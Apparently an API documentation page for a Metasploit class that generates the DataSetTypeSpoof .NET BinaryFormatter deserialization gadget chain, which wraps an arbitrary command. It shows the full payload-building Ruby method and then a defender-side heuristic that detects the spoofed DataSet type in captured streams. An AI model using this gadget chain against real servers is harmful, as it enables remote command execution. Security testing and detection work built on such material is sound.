Class: Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof
- Inherits: Types::SerializedStream
  - Object
  - BinData::Record
  - Types::SerializedStream
  - Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof
- Defined in: lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb
Class Method Summary
- .generate(cmd) ⇒ Object
  DataSetTypeSpoof. Credits: Finders: James Forshaw. Contributors: Soroush Dalili, Markus Wulftange, Jang. References: https://github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
Methods inherited from Types::SerializedStream
from_values, #get_object, #set_object
Class Method Details
.generate(cmd) ⇒ Object
DataSetTypeSpoof
Credits:
Finders: James Forshaw
Contributors: Soroush Dalili, Markus Wulftange, Jang
References:
https://github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
```ruby
# File 'lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb', line 15

def self.generate(cmd)
  # Inner gadget chain carrying cmd; it is embedded below as a byte array
  inner = GadgetChains::TextFormattingRunProperties.generate(cmd)
  system_data = Assemblies::VERSIONS['4.0.0.0'].fetch('System.Data')

  library = Types::RecordValues::BinaryLibrary.new(
    library_id: 3,
    library_name: system_data.to_s
  )

  self.from_values([
    Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
    Types::RecordValues::BinaryLibrary.new(library_id: 2, library_name: 'mscorlib'),
    library,
    # The class name is assembly-qualified, while library_id (2) refers to the mscorlib library
    Types::RecordValues::ClassWithMembersAndTypes.new(
      class_info: Types::General::ClassInfo.new(
        obj_id: 1,
        name: 'System.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        member_names: %w[
          DataSet.RemotingFormat
          DataSet.DataSetName
          DataSet.Namespace
          DataSet.Prefix
          DataSet.CaseSensitive
          DataSet.LocaleLCID
          DataSet.EnforceConstraints
          DataSet.ExtendedProperties
          DataSet.Tables.Count
          DataSet.Tables_0
        ]
      ),
      member_type_info: Types::General::MemberTypeInfo.new(
        binary_type_enums: %i{
          Class
          String
          String
          String
          Primitive
          Primitive
          Primitive
          Object
          Primitive
          PrimitiveArray
        },
        additional_infos: [
          {type_name: 'System.Data.SerializationFormat', library_id: library.library_id},
          1,
          8,
          1,
          8,
          2
        ]
      ),
      library_id: 2,
      member_values: [
        # DataSet.RemotingFormat: a System.Data.SerializationFormat enum with value__ = 1
        Types::Record.from_value(Types::RecordValues::ClassWithMembersAndTypes.new(
          class_info: Types::General::ClassInfo.new(
            obj_id: -4,
            name: 'System.Data.SerializationFormat',
            member_names: %w[ value__ ]
          ),
          member_type_info: Types::General::MemberTypeInfo.new(
            binary_type_enums: %i{ Primitive },
            additional_infos: [ 8 ]
          ),
          library_id: library.library_id,
          member_values: [ 1 ]
        )),
        # DataSetName, Namespace and Prefix all share the string object with id 5
        Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(obj_id: 5)),
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)),
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)),
        false,
        1033,
        false,
        Types::Record.from_value(Types::RecordValues::ObjectNull.new),
        1,
        # DataSet.Tables_0: reference to the byte array with object id 6
        Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 6))
      ]
    ),
    # Byte array (object id 6) holding the serialized inner stream
    Types::RecordValues::ArraySinglePrimitive.new(
      array_info: { obj_id: 6, member_count: inner.num_bytes },
      primitive_type_enum: Enums::PrimitiveTypeEnum[:Byte],
      members: inner.to_binary_s.bytes
    ),
    Types::RecordValues::MessageEnd.new
  ])
end
```
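The record list in `generate` above names its root class `System.Data.DataSet, System.Data, Version=4.0.0.0, ...` while giving it `library_id: 2`, the `mscorlib` library. The following defender-side check for that mismatch is an added example, not Metasploit or ysoserial.net code: the names `EXTRA`, `read_i32`, `read_lps`, `dataset_type_spoof?` and `sample_stream` are hypothetical, the rule is a heuristic assumption, and the sample bytes are a constructed header fragment with no payload.

```ruby
require 'stringio'
# BinaryTypeEnum values that carry AdditionalInfo in an MS-NRBF MemberTypeInfo
EXTRA = { 0 => :byte, 3 => :str, 4 => :cls, 7 => :byte }.freeze
def read_i32(io); io.read(4).unpack1('l<'); end
# LengthPrefixedString: 7-bit encoded length, then that many UTF-8 bytes
def read_lps(io)
  len = shift = 0
  loop do
    b = io.readbyte
    len |= (b & 0x7f) << shift
    shift += 7
    break if b < 0x80
  end
  io.read(len).force_encoding('UTF-8')
end

# True when the first class record is named "System.Data.DataSet, <assembly>" but bound to another library
def dataset_type_spoof?(bytes)
  io = StringIO.new(bytes.b)
  return false unless io.readbyte.zero? # SerializationHeaderRecord
  io.read(16)                           # root id, header id, major, minor
  libs = {}
  while (type = io.readbyte) == 12      # BinaryLibrary records
    id = read_i32(io)
    libs[id] = read_lps(io)
  end
  return false unless type == 5         # ClassWithMembersAndTypes
  read_i32(io)                          # object id
  name = read_lps(io)
  count = read_i32(io)
  count.times { read_lps(io) }          # member names
  io.read(count).bytes.each do |t|      # skip each member's AdditionalInfo
    io.readbyte if EXTRA[t] == :byte
    read_lps(io) if %i[str cls].include?(EXTRA[t])
    read_i32(io) if EXTRA[t] == :cls
  end
  lib = libs[read_i32(io)].to_s         # library the class record is bound to
  name.start_with?('System.Data.DataSet,') && !lib.start_with?('System.Data')
rescue EOFError, NoMethodError, ArgumentError
  false                                 # truncated or malformed input
end

# Constructed sample: header records only, one String member, no payload
def sample_stream(name, lib_id)
  lps = ->(s) { [s.bytesize].pack('C') + s } # strings under 128 bytes
  [0, 1, -1, 1, 0].pack('Cl<l<l<l<') + [12, 2].pack('Cl<') + lps.call('mscorlib') +
    [12, 3].pack('Cl<') + lps.call('System.Data, Version=4.0.0.0') + [5, 1].pack('Cl<') +
    lps.call(name) + [1].pack('l<') + lps.call('DataSet.DataSetName') + [1, lib_id].pack('Cl<')
end
```

The check only inspects the first class record after the library records, so it fits as a triage rule on captured BinaryFormatter input rather than as a complete MS-NRBF parser.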